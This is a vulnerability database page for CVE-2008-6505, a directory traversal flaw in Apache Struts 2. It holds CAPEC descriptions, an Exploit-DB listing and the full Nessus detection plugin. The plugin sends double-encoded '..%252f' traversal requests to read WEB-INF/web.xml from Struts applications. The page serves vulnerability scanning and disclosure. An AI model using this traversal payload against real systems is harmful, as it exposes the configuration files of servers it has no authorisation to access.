Vulnerabilities > CVE-2008-6505 - Path Traversal vulnerability in Apache Struts

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
apache
CWE-22
nessus
exploit available

Summary

Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

descriptionStruts 2.0.11 Multiple Directory Traversal Vulnerabilities. CVE-2008-6505. Remote exploits for multiple platform
idEDB-ID:32565
last seen2016-02-03
modified2008-11-04
published2008-11-04
reporterCsaba Barta
sourcehttps://www.exploit-db.com/download/32565/
titleStruts <= 2.0.11 - Multiple Directory Traversal Vulnerabilities

Nessus

NASL familyCGI abuses
NASL idSTRUTS_2_0_12_DIR_TRAVERSAL.NASL
descriptionThe remote web server is using Apache Struts, a web application framework for developing Java EE web applications. The version of Apache Struts 2 installed on the remote host fails to properly decode and normalize the request path before serving static content. Using double-encoded directory traversal sequences, an anonymous remote attacker can leverage this issue to download files outside the static content folder.
last seen2020-06-01
modified2020-06-02
plugin id34946
published2008-11-24
reporterThis script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/34946
titleApache Struts 2 < 2.0.12 / 2.1.3 Dispatcher Directory Traversal
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(34946);
  script_version("1.20");
  script_cvs_date("Date: 2019/02/07 12:14:48");

  script_cve_id("CVE-2008-6505");
  script_bugtraq_id(32104);
  script_xref(name:"Secunia", value:"32497");

  script_name(english:"Apache Struts 2 < 2.0.12 / 2.1.3 Dispatcher Directory Traversal");
  script_summary(english:"Attempts to read web.xml.");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server contains a Java framework that is affected by
a directory traversal vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote web server is using Apache Struts, a web application
framework for developing Java EE web applications.

The version of Apache Struts 2 installed on the remote host fails to
properly decode and normalize the request path before serving static
content. Using double-encoded directory traversal sequences, an
anonymous remote attacker can leverage this issue to download files
outside the static content folder."
  );
  script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/WW-2779");
  script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-004.html");
  script_set_attribute(
    attribute:"solution",
    value:"Upgrade to Struts 2.0.12 / 2.1.3 or later."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2008-6505");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2008/08/21");
  script_set_attribute(attribute:"patch_publication_date", value:"2008/08/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/11/24");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("webmirror.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:8080);

file = 'WEB-INF/web.xml';
file_pat = "^<web-app +id=";

cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list();
# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp  / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match3))
    {
      urls = make_list(urls, match3[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}
if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

# Always check web root
urls = make_list(urls, "/");

# Struts is slow
timeout = get_read_timeout() * 2;
if(timeout < 10)
  timeout = 10;
http_set_read_timeout(timeout);

urls = list_uniq(urls);

foreach dir (urls)
{
  # Strip the filename and extensions so we have only the directory
  dir = ereg_replace(
    pattern : "(/[^/]+\.(act(ion)?|do|jsp)($|\?|;))",
    string  : dir,
    replace : ""
  );

  # Identify a web app using Struts.
  res = http_send_recv3(
    port   : port,
    method : "GET",
    item   : dir + "/struts/webconsole.html",
    exit_on_fail : TRUE
  );

  # If so...
  if (">OGNL Console<" >< res[2])
  {
    for (levels=3; levels<8; levels++)
    {
      exploit = "/struts/" + crap(data:"..%252f", length:7*levels) + file;
      url = dir + exploit;

      res = http_send_recv3(
        port   : port,
        method : "GET",
        item   : url,
        exit_on_fail : TRUE
      );

      # There's a problem if we get the file we're looking for.
      if (egrep(pattern:file_pat, string:res[2]))
      {
        security_report_v4(
          port        : port,
          severity    : SECURITY_WARNING,
          file        : file,
          request     : make_list(build_url(qs:url, port:port)),
          output      : data_protection::sanitize_user_full_redaction(output:chomp(res[2])),
          attach_type : 'text/plain'
        );
        exit(0);
      }
    }
  }
}
exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');